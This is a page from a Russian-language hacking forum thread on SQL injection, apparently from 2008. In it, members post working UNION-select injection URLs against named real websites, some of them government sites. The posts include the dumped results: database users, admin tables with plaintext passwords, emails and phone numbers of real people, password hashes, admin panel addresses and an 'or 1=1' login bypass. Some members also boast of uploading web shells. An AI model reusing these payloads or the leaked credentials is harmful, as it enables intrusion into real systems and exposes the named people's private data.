SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Buddah

    Buddah New Member

    Joined:
    26 Nov 2007
    Messages:
    1
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/*
    нашел сайт очень интересный)) у самого опыта мало, может кому тоже интересно будет
     
  2. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    dit.gov.bt - Pr5
    Code:
    http://www.dit.gov.bt/newsdetail.php?newsId=-44+union+select+11,22,concat(0x2020202020202020202020,user,0x3a,password),44+from+mysql.user--
     
  3. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Code:
    [COLOR=Plum]http://vehaauto.ru/catalog.php?id_article=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11/*&id_page=1 [/COLOR]
    4.0.27-max-log


    Code:
    [COLOR=Plum]http://www.cccp.de/humor/showitem.php?id=4+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5/*[/COLOR]
    4.0.15:web2@localhost:usr_web2_1


    Code:
    [COLOR=Plum]http://www.generalsemantics.org/inner.php?page=news&id=999999+union+select+1,2,version(),4/*[/COLOR]
    5.0.22

    Code:
    [COLOR=Plum]http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,table_name+from+information_schema.tables/*[/COLOR]
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    KEY_COLUMN_USAGE
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    tbl_adminusers
    tbl_featured_products
    tbl_mainpages
    tbl_masterpages
    tbl_news
    tbl_quotes
    tbl_subpages


    Code:
    [COLOR=Plum]http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,concat_ws(0x3a,UserName,LoginName,PassWord,email,phoneNo)+from+tbl_adminusers/*[/COLOR]
    Lance Strate:lstrate:heroes:[email protected]:201-921-4745
    Marty Levinson:Marty:Fairytales:[email protected]:718-793-6621
    nmtucson:nmtucson:justme:[email protected]:520-225-0476
    Jennifer Clarke:jennifer:56375637:[email protected]:817-922-9950


    Login Page http://www.generalsemantics.org/admin/login.php


    Code:
    [COLOR=Plum]http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23[/COLOR]
    5.0.51a:admin@localhost

    Code:
    [COLOR=Plum]http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+limit+19,1[/COLOR]
    table_name=aut

    Code:
    [COLOR=Plum]http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x617574+limit+1,1[/COLOR]
    columns_name=log,pass

    Code:
    [COLOR=Plum]http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,concat_ws(0x3a,log,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+aut+limit+0,1[/COLOR]
    lisa:lisa
    dima:dima
     
    #6103 ILYAtirtir, 1 Aug 2008
    Last edited: 1 Aug 2008
    1 person likes this.
  4. Buddah

    Buddah New Member

    Joined:
    26 Nov 2007
    Messages:
    1
    Likes Received:
    4
    Reputations:
    0
    база юзеров:

    username
    Code:
    http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,username,null,null,null,null,null,null,null,null,null,null+from+users+where+1=1/*
    password
    Code:
    http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,password,null,null,null,null,null,null,null,null,null,null+from+users+where+1=1/*
    мыла
    Code:
    http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,email,null,null,null,null,null,null,null,null,null,null+from+users+where+1=1/*

    таблицы
    Code:
    http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,column_name,null,null,null,null,null,null,null,null,null,null+from+information_schema.columns/*

    подскажите как в данном слуаче найти вдминку? также не получилось узнать version() и database()
    ---------------
    сорри тупанул
    version() - 5.0.32-Debian_7etch5-log
    database() - borodinmokaru

    админку все еще не нашел
     
    #6104 Buddah, 1 Aug 2008
    Last edited: 1 Aug 2008
    1 person likes this.
  5. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    worldrowing.com - Pr7
    Code:
    http://www.worldrowing.com/display/modules/media/media_detail.php?mediacenterid=-8+union+select+1,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+mysql.user+limit+0,1--&imgnum=13&mdatype=1&searchKwd=&searchFrom=&searchTo=&cat=&subcat=209&subcat2=&page=0
     
    1 person likes this.
  6. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    version() - 4.1.20-LOG
    user() - VAULT@LOCALHOST
    database() - VAULT

    version() - 4.1.20-log
    user() - sportsouthuk@localhost
    database() - sportsouthuk

    version() - 4.1.22-standard
    user() - roguegov_publicr@localhost
    database() - roguegov_rgov
     
    1 person likes this.
  7. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    emspost.ru
    VERSION() 4.1.22-log
    DATABASE() emspost_1
    USER() emspost_1@localhost
    Версия 4, такчто всё подобрано руками :cool:

    Сразу под парсер, разбивать по :::
    Code:
    http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0x3a3a3a,id,name,company,email,city,address,phone,login,pwd),0x3a3a3a),6,7,8,9+FROM+ems_clients+LIMIT+0,1/*
     
    2 people like this.
  8. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    http://www.bbw.ro

    админка тут http://www.bbw.ro/admin/login.php

    version()= 5.0.45
    user() = draft@localhost
    database() = bbw
     
  9. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    http://emspost.ru/adm/ админка, но пассы хз где
    http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0x3a3a3a,id,login,pwd),0x3a3a3a),6,7,8,9+FROM+ems_users+LIMIT+1,1/*

    эти не подходят
     
  10. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Business-academy.ru
    5 ветка и таблы..
    business-academy.ru/auth.form.php
    business-academy.ru/admin - 403
    еще какието юзверы )
    и форум... business-academy.ru/forum - IPB 2.2.2 - хотел шелл залить.. но пасс так не разшифровал:

    lenar:ee0801a9fb2b272b10830d0ffcf8c589
    red_bar0n:84c1b6bd2d4b190b1583e11bf4ccd929
    s2sage:f7ea695c3b11000daedb0db1f7dd5619
    напоследок.. еще юзеры...


    Lor-homeopat.ru - PR 4
    Launion.gov.ph - PR 3
    пытался чтот сделать... но (


    Bbw.ro
    login: admin' or 1=1/*
    pass: любой
     
    #6110 sabe, 2 Aug 2008
    Last edited: 3 Aug 2008
    2 people like this.
  11. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Ну что ж... Начну и я пожалуй:

    qpogorod.ru

    Code:
    http://www.qpogorod.ru/raskazread.php?idArticle=-32+union+select+concat_ws(version(),0x3a,user()),2,3--
    4.0.27

    [email protected]


    Сервер:
    Apache/1.3.33 (Unix) mod_fastcgi/2.4.0 FrontPage/5.0.2.2623 PHP/4.3.10 mod_gzip/1.3.19.1a mod_ssl/2.8.22 OpenSSL/0.9.7b rus/PL30.20

    P.S: админку не нашел, так что дальше не раскручивал.
     
    1 person likes this.
  12. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    version() - 4.1.20
    user() - latinore_content@localhost
    database() - latinore_content


    version() - 4.1.21-standard
    user() - root@localhost
    database() - greenshift

    version() - 4.1.22-standard
    user() - boxnews_a2k@localhost
    database() - boxnews_a2k
     
    #6112 warlok, 2 Aug 2008
    Last edited: 2 Aug 2008
  13. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    http://www.krasota.ru

    4.1.16-standard-log ::: [email protected] ::: krasota_v3

    таблички подобрать не смог...

    админка тут http://www.krasota.ru/admin/
     
    #6113 MirA, 2 Aug 2008
    Last edited: 2 Aug 2008
    1 person likes this.
  14. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    mind.textdriven.com

    Database : bpasanek_metabase.
    Database Version: 4.1.22-log

    User: bpasanek@localhost
     
  15. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Eutrainingsite.com - PR 6
    5 ветка.. таблы.
    /admin - 403
    /forum.php
    редакторы..


    Milledcarbon.com - PR 4
    4 ветка, подобрал талицу news )


    Bustur.ru - PR 3
    5 ветка и таблы..


    Fellini.net.ua - PR 3
    4 ветка, рут.
     
    #6115 sabe, 3 Aug 2008
    Last edited: 3 Aug 2008
    1 person likes this.
  16. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.rokf.ru/autosale/?s=autos&id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a3a,password,0x3a3a,admin),8,9,10,11,12,13,14,15,16+from+phorum_users+limit+0,50/*

    Login: admin
    pass: adminus
    Дешевый админ =)

    Есть еще табличка dealers быть может в ней где-то зарыт ключик к
    http://www.rokf.ru/admin

    Но уж очень геморно рыть этот шлак )
     
  17. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Eggs.net.ua - PR 4
    Веселі Яйця
    5 ветка и таблы..
    eggs_admin;eggs210705
    еще пассы..
    мыльники..
    и самое вкусное..)
    file_priv y
    залили шелл..)


    Pangkalpinang.go.id - PR 3
    5 ветка и таблы-мазахистов.)
    /admin


    Mypspwebsite.com
    рут.. и /admin/members/default.php

    Cyberblue.it-lighthouse.com
    юзеры )

    It-lighthouse.com
    непонятные пароли ;)
    сайт под эту базу не был обнаружен.)


    Crestron-home.ru
    Animedvd.ru
     
    #6117 sabe, 3 Aug 2008
    Last edited: 3 Aug 2008
    1 person likes this.
  18. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    PHP:
    http://una.ge/eng/artdetail.php?group=articles&id=102+union+select+1,2,version(),4,5,6,7,8,9
    PHP:
    http://una.ge/eng/artdetail.php?group=articles&id=102+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables+limit+16,10
    Дальше сам крути
     
    #6118 DDoSька, 3 Aug 2008
    Last edited: 3 Aug 2008
    2 people like this.
  19. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    162
    Likes Received:
    37
    Reputations:
    5
    www.cyberthing.net

    http://www.cyberthing.net/video-play.php?id=9999999999+union+select+1,2,3,4,5,6,7/*

    5.0.22-Debian_0ubuntu6.06.10-log
     
    1 person likes this.
  20. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    не ту взял , та "4"-ка =)
     
Thread Status:
Not open for further replies.